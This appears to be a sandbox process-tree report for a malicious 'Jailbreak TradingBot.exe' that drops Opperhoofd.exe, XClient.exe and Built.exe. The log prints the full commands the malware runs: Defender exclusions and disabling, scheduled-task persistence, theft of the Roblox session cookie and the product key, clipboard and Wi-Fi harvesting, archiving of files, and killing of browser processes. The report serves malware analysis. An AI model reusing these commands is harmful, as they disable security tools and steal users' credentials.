  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
  2⤵
  PID:4388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
  2⤵
  PID:1684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:4936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:2460
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
  2⤵
  PID:4200
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4188 /prefetch:1
  2⤵
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
  2⤵
  PID:540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3444 /prefetch:8
  2⤵
  PID:2172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
  2⤵
  PID:2288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6216 /prefetch:8
  2⤵
  PID:1920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
  2⤵
  PID:1944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
  2⤵
  PID:4528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6632 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5152
- C:\Users\Admin\Downloads\Jailbreak TradingBot.exe
  "C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"
  2⤵
  - Executes dropped EXE
  PID:5260
- C:\Users\Admin\Downloads\Jailbreak TradingBot.exe
  "C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5320
- - C:\Users\Admin\AppData\Roaming\Opperhoofd.exe
    "C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of AdjustPrivilegeToken
    PID:5504
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Opperhoofd.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6092
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Opperhoofd.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5884
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5604
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5632
- - C:\Users\Admin\AppData\Roaming\Built.exe
    "C:\Users\Admin\AppData\Roaming\Built.exe"
    3⤵
    - Executes dropped EXE
    PID:5588
  - - C:\Users\Admin\AppData\Roaming\Built.exe
      "C:\Users\Admin\AppData\Roaming\Built.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Loads dropped DLL
      PID:5708
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'"
        5⤵
        
        PID:6056
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Built.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:600
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        
        PID:6068
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1596
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:6136
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5652
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:5368
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5408
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        5⤵
        
        PID:5176
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        6⤵
        
        PID:5636
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        5⤵
        
        PID:5788
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        6⤵
        
        PID:5840
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:5700
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:5596
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:5220
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:5676
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe""
        5⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:5252
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Roaming\Built.exe"
        6⤵
        Views/modifies file attributes
        
        PID:5948
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:6008
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5792
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:6052
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5324
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        
        PID:5108
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        
        PID:5544
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:5216
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:5608
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:220
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5996
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5044
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5308
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5556
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5596
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6068
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:5520
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:6140
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        5⤵
        
        PID:5476
      - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        6⤵
        
        PID:5580
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5180
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5204
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:5488
      - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        6⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5668
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5044
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5820
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:5660
      - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        6⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5500
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5780
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5488
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:5568
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5044
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5664
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5628
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5632
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5268
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3604"
        5⤵
        
        PID:5516
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3604
        6⤵
        Kills process with taskkill
        
        PID:5668
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3604"
        5⤵
        
        PID:5676
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3604
        6⤵
        Kills process with taskkill
        
        PID:6136
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 416"
        5⤵
        
        PID:5904
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 416
        6⤵
        Kills process with taskkill
        
        PID:5560
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 416"
        5⤵
        
        PID:6072
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 416
        6⤵
        Kills process with taskkill
        
        PID:5448
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4388"
        5⤵
        
        PID:5188
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4388
        6⤵
        Kills process with taskkill
        
        PID:5872
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4388"
        5⤵
        
        PID:5500
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4388
        6⤵
        Kills process with taskkill
        
        PID:3276
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4640"
        5⤵
        
        PID:5700
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4640
        6⤵
        Kills process with taskkill
        
        PID:5768
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4640"
        5⤵
        
        PID:6024
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4640
        6⤵
        Kills process with taskkill
        
        PID:5160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1684"
        5⤵
        
        PID:5680
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1684
        6⤵
        Kills process with taskkill
        
        PID:6108
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1684"
        5⤵
        
        PID:5516
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1684
        6⤵
        Kills process with taskkill
        
        PID:5244
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2460"
        5⤵
        
        PID:4648
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2460
        6⤵
        Kills process with taskkill
        
        PID:6040
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2460"
        5⤵
        
        PID:5904
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5476
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2460
        6⤵
        Kills process with taskkill
        
        PID:5456
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4064"
        5⤵
        
        PID:5064
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4064
        6⤵
        Kills process with taskkill
        
        PID:5208
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4064"
        5⤵
        
        PID:5872
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5308
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4064
        6⤵
        Kills process with taskkill
        
        PID:1344
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2172"
        5⤵
        
        PID:5564
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2172
        6⤵
        Kills process with taskkill
        
        PID:5764
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2172"
        5⤵
        
        PID:6044
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2172
        6⤵
        Kills process with taskkill
        
        PID:5820
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1944"
        5⤵
        
        PID:768
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1944
        6⤵
        Kills process with taskkill
        
        PID:5704
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1944"
        5⤵
        
        PID:6084
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1944
        6⤵
        Kills process with taskkill
        
        PID:5556
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4528"
        5⤵
        
        PID:5396
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4528
        6⤵
        Kills process with taskkill
        
        PID:5228
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4528"
        5⤵
        
        PID:2852
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4528
        6⤵
        Kills process with taskkill
        
        PID:6120
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:5224
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5188
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:5492
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5580
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        5⤵
        
        PID:416
      - C:\Windows\system32\getmac.exe
        
        getmac
        6⤵
        
        PID:5236
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI55882\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\mRjyk.zip" *"
        5⤵
        
        PID:2716
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5676
      - C:\Users\Admin\AppData\Local\Temp\_MEI55882\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI55882\rar.exe a -r -hp"politie13" "C:\Users\Admin\AppData\Local\Temp\mRjyk.zip" *
        6⤵
        Executes dropped EXE
        
        PID:5884
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        5⤵
        
        PID:5860
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        6⤵
        
        PID:4148
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        5⤵
        
        PID:4276
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        6⤵
        
        PID:6120
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:5400
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:6056
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        5⤵
        
        PID:5288
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4228
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:5128
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:4828
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        5⤵
        
        PID:3136
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2592
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Roaming\Built.exe""
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3936
      - C:\Windows\system32\PING.EXE
        
        ping localhost -n 3
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3892
- C:\Users\Admin\Downloads\Jailbreak TradingBot.exe
  "C:\Users\Admin\Downloads\Jailbreak TradingBot.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5844
- - C:\Users\Admin\AppData\Roaming\Opperhoofd.exe
    "C:\Users\Admin\AppData\Roaming\Opperhoofd.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5936
- - C:\Users\Admin\AppData\Roaming\Built.exe
    "C:\Users\Admin\AppData\Roaming\Built.exe"
    3⤵
    - Executes dropped EXE
    PID:6024
  - - C:\Users\Admin\AppData\Roaming\Built.exe
      "C:\Users\Admin\AppData\Roaming\Built.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5244

C:\Windows\System32\CompPkgSrv.exe
